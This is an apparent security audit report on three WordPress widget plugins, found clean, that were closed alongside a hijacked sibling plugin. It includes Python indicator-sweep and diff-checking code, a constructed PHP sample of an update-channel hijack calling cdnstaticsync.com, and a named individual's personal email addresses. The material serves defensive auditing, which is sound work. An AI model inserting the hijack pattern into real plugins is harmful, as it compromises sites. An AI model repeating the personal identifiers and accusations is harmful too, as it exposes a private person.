
Audit #49 Benign

3 affected plugins · 21k+ combined active installs · 3 closed on wp.org · baseline → head 2.2.1 · suspect committer satrya · by WP Beacon · closed 4d ago

Actor: Benjamin (wp.org @milkitall, GitHub tombenj, gouldbenjamin135@gmail.com / tomgolan@gmail.com) — operates the inherited @satrya / "Ga Satrya" (gasatrya.dev) account

Verdict: benign — these three plugins are closed but clean. If your site runs Advanced Random Posts Widget, Smart Recent Posts Widget, or Recent Comments Widget Plus, your site is not compromised. We read every file across the full release history of all three and found no malware — no backdoor, no update-channel hijack, no remote code execution, no obfuscation, in any version ever shipped.

All three were closed by WordPress.org on 2026-04-26 (guideline-violation) — the same day as their sibling scroll-top, which was weaponized. scroll-top is a confirmed-malicious Plugin Update Checker (PUC) hijack that redirected its update channel to cdnstaticsync.com. All four plugins live under the same WordPress.org account — satrya / "Ga Satrya" (gasatrya.dev) — which is operated by the actor Benjamin (wp.org @milkitall, GitHub tombenj). When WordPress.org takes down a compromised author account, it closes that author's entire portfolio at once. These three widgets were swept up in that account-level action, not because they contain malicious code.

The actor weaponized only the high-value target: scroll-top has 20,000+ active installs, making its auto-update channel a worthwhile thing to hijack. The three widgets here were left as-is — clean, but tainted by association with the account that owns them. This audit exists to tell the ecosystem the difference: same takedown, same bad actor, but these specific plugins were never weaponized.

Investigated — no compromise found.

Audit retained for the record. No action required.

Affected plugins (3)

All plugins covered by this incident report. Combined exposure: 21k+ active installs across 3 slugs.

| Plugin | Active installs | Trunk version | wp.org status |
| --- | --- | --- | --- |
| Advanced Random Posts Widget | 10k+ | 2.2.1 | Closed on wp.org |
| Smart Recent Posts Widget | 9k+ | 1.0.4 | Closed on wp.org |
| Recent Comments Widget Plus | 2k+ | 1.3 | Closed on wp.org |

Scope

Three plugins under the satrya WordPress.org account, all closed the same day:

| Plugin | Installs | HEAD version | Closed | Reason |
| --- | --- | --- | --- | --- |
| advanced-random-posts-widget | 10,000 | 2.2.1 (2023-08-05) | 2026-04-26 | guideline-violation |
| smart-recent-posts-widget | 9,000 | 1.0.4 (2024-07-28, r3126813) | 2026-04-26 | guideline-violation |
| comments-widget-plus | 2,000 | 1.3 (2022-10-26) | 2026-04-26 | guideline-violation |

How they surfaced

A co-closure cluster pivot: these three were closed on the exact same day (2026-04-26) as the confirmed-malicious scroll-top, under the same satrya account. WordPress.org closes a compromised author's whole portfolio in one action, so same-day, same-account closures next to a known-malicious plugin are strong audit leads. Each was then deep-audited individually.

File-by-file review (every file, full history)

Each plugin had every PHP/JS file read with full semantic understanding, plus an IOC sweep over every blob in every commit (not just HEAD):

  • No update-channel hijack — no Plugin Update Checker, no pre_set_site_transient_update_plugins/plugins_api/upgrader_* filters, no hardcoded update/download URLs, no cdnstaticsync.com / anadnet /bro/3/ (scroll-top's signature).
  • No remote code — these plugins make no outbound network calls at all. No wp_remote_*, curl_exec, file_get_contents on a URL, fsockopen.
  • No obfuscation / execution primitives — no base64_decode, gzinflate, str_rot13, \x.. chains, eval, assert, create_function, variable-function calls.
  • No file-write / uploader — no $_FILES, move_uploaded_file, or file_put_contents/fwrite to paths outside the plugin directory.
  • No auth backdoor / time-bomb — no magic headers, IP whitelists, conditional admin grants, or date/count-gated activation.

Result: clean for all three, in HEAD and in 100% of release history. They are ordinary WordPress widgets (recent posts / random posts / recent comments) that escape their output and sanitize their inputs.
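An added example (not WP Beacon's own tooling) of the kind of indicator sweep the checklist above describes, run over two constructed PHP blobs: a widget written the way the clean trio is described, and a stand-in for the scroll-top update-channel hijack shape built only from the filter name and domain the report cites. The indicator regexes, the sample code and the blob-id scheme are assumptions of this example.

```python
import re

# Indicator classes taken from the audit checklist, expressed as regexes over PHP source.
# These are an illustrative approximation of the sweep, not WP Beacon's own tooling.
INDICATORS = {
    "update-channel hijack": re.compile(
        r"Plugin.?Update.?Checker|pre_set_site_transient_update_plugins|plugins_api|upgrader_\w+|cdnstaticsync\.com", re.I),
    "remote code / outbound call": re.compile(
        r"\b(wp_remote_\w+|curl_exec|fsockopen)\s*\(|file_get_contents\s*\(\s*['\"]https?://", re.I),
    "obfuscation / execution primitive": re.compile(
        r"\b(base64_decode|gzinflate|str_rot13|eval|assert|create_function)\s*\(|(\\x[0-9a-f]{2}){4,}|\$\w+\s*\(", re.I),
    "file write / uploader": re.compile(
        r"\$_FILES|\b(move_uploaded_file|file_put_contents|fwrite)\s*\(", re.I),
}


def scan_php(source):
    """Return (indicator, line_no, line) for every line of one PHP blob that matches an indicator."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((name, no, line.strip()))
    return hits


def sweep(blobs):
    """blobs maps 'rNNN:path' -> source for every file in every revision; keep only blobs with hits."""
    return {blob_id: hits for blob_id, src in blobs.items() if (hits := scan_php(src))}


# Constructed sample: a widget written the way the audit describes the clean trio
# (escaped output, sanitized input, no network calls). Not the real plugin code.
CLEAN_WIDGET = """<?php
class Sample_Recent_Posts_Widget extends WP_Widget {
    public function widget( $args, $instance ) {
        $title = sanitize_text_field( $instance['title'] );
        $ids   = array_map( 'intval', (array) $instance['exclude'] );
        echo '<h3>' . esc_html( $title ) . '</h3>';
        echo '<a href="' . esc_url( get_permalink() ) . '">' . esc_html( get_the_title() ) . '</a>';
    }
}
"""
# Constructed sample of the update-channel hijack shape the audit attributes to scroll-top:
# a transient filter plus an outbound fetch from the domain named in the report (path made up).
HIJACK_SHAPE = """<?php
add_filter( 'pre_set_site_transient_update_plugins', function ( $transient ) {
    $resp = wp_remote_get( 'https://cdnstaticsync.com/update.json' );
    return $transient;
} );
"""
```

A hit is a lead for a human read, not a verdict; legitimate code can call `file_put_contents` or use a variable function, which is why the audit reads every flagged line in context.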

The r3126813 clarification

smart-recent-posts-widget v1.0.4 (SVN r3126813) was previously referenced as the actor's commit on the hijacked account. On inspection, r3126813 is a security-hardening release, not an injection. Its raw diff looks like a total rewrite only because of a CRLF→LF line-ending normalization; with whitespace ignored, the actual change set is exclusively output-escaping and input-sanitization on existing lines (esc_html/esc_attr/esc_url, sanitize_text_field, wp_strip_all_tags, array_map('intval', …)) plus a Tested up to: 6.5.4 bump. It fixes potential XSS; it ships no payload. r3126813 is useful only as proof the actor had account access — not as evidence of malware in this plugin.
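To show why the raw r3126813 diff misleads, here is an added example (not the audit's own tooling) that diffs a constructed CRLF "before" against an LF "after" once raw and once whitespace-insensitively, then checks that every surviving added line is one of the escaping/sanitization calls named above. The PHP lines are constructed stand-ins, not the plugin's real source.

```python
import difflib
import re

# Constructed stand-in for the file before r3126813: CRLF line endings, unescaped output.
BEFORE_LINES = [
    "<?php",
    "function sample_widget_output( $args, $instance ) {",
    "    $title   = $instance['title'];",
    "    $exclude = $instance['exclude'];",
    "    echo '<h3>' . $title . '</h3>';",
    "    echo '<a href=\"' . get_permalink() . '\">' . get_the_title() . '</a>';",
    "}",
]
# Constructed stand-in for the file after: LF endings, four lines hardened, nothing else touched.
AFTER_LINES = [
    "<?php",
    "function sample_widget_output( $args, $instance ) {",
    "    $title   = sanitize_text_field( $instance['title'] );",
    "    $exclude = array_map( 'intval', (array) $instance['exclude'] );",
    "    echo '<h3>' . esc_html( $title ) . '</h3>';",
    "    echo '<a href=\"' . esc_url( get_permalink() ) . '\">' . esc_html( get_the_title() ) . '</a>';",
    "}",
]
BEFORE = "\r\n".join(BEFORE_LINES) + "\r\n"
AFTER = "\n".join(AFTER_LINES) + "\n"

# The escaping / sanitization calls the audit found in the whitespace-insensitive change set.
HARDENING_RX = re.compile(r"\b(esc_html|esc_attr|esc_url|sanitize_text_field|wp_strip_all_tags)\s*\(|array_map\(\s*'intval'")


def normalize(line):
    """Collapse all whitespace, which also erases the CRLF-vs-LF difference (like `git diff -w`)."""
    return " ".join(line.split())


def changed_lines(before, after, ignore_ws=False):
    """Return (removed, added) lines as a line-based diff reports them."""
    a, b = before.splitlines(keepends=True), after.splitlines(keepends=True)
    if ignore_ws:
        a, b = [normalize(l) for l in a], [normalize(l) for l in b]
    removed, added = [], []
    for tag, i1, i2, j1, j2 in difflib.SequenceMatcher(None, a, b, autojunk=False).get_opcodes():
        if tag in ("replace", "delete"):
            removed += a[i1:i2]
        if tag in ("replace", "insert"):
            added += b[j1:j2]
    return removed, added


def hardening_only(added):
    """True when every added line introduces one of the listed escaping/sanitization calls."""
    return bool(added) and all(HARDENING_RX.search(line) for line in added)
```

Raw, every line of the constructed file shows as changed; with whitespace ignored only the four hardened lines remain, and each of them passes `hardening_only`.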

Attribution (the actionable finding)

While the code is clean, the plugin headers carry strong campaign attribution tying this account to the scroll-top hijacker:

  • smart-recent-posts-widget embeds Author Email: gouldbenjamin135@gmail.com from v1.0.3 (2023-08-05) onward — ~2.5 years before the April 2026 scroll-top campaign.
  • comments-widget-plus v1.3 flips the Author URI idenovasi.com → gasatrya.dev and the author Idenovasi → Ga Satrya.
  • advanced-random-posts-widget shows the ownership chain Theme Junkie → Idenovasi → satrya.

These plugins were originally built by idenovasi (a legitimate Indonesian agency, idenovasi.com) and migrated to the satrya / "Ga Satrya" identity, which the scroll-top audit (#12) attributes to Benjamin (@milkitall, tombenj, tomgolan@gmail.com). The gouldbenjamin135@gmail.com address found here is an additional identifier for the same actor.

Hijack-indicator matrix

| Indicator | Result |
| --- | --- |
| Code-level malware patterns? | No — zero across full history of all three |
| Outbound C2 / known bad domains? | No — no remote calls of any kind |
| Update-channel hijack (the scroll-top PUC pattern)? | No — absent in HEAD and history |
| Fresh malicious commit before closure? | No — last commits 2022–2024; no 2026 activity |
| Account ownership drift? | Yes — idenovasi → satrya / "Ga Satrya" (gasatrya.dev); gouldbenjamin135@gmail.com in headers since 2023 |
| Actor confirmed bad elsewhere? | Yes — same account weaponized scroll-top (audit #12, malicious) |

Clean code + positive actor association → benign code, closed as collateral of an account-level takedown.

Comparable cases

  • scroll-top (#12) — the weaponized sibling under the same account: PUC update-channel hijack to cdnstaticsync.com. The contrast is the point of this audit.
  • Method note: same-account co-closure is a strong lead but not proof of malware. WordPress.org takes down a bad actor's entire portfolio at once, so siblings can be clean collateral. The cluster pivot correctly surfaced Benjamin's portfolio; per-plugin deep audits correctly separated the one weaponized plugin (scroll-top) from these three clean ones.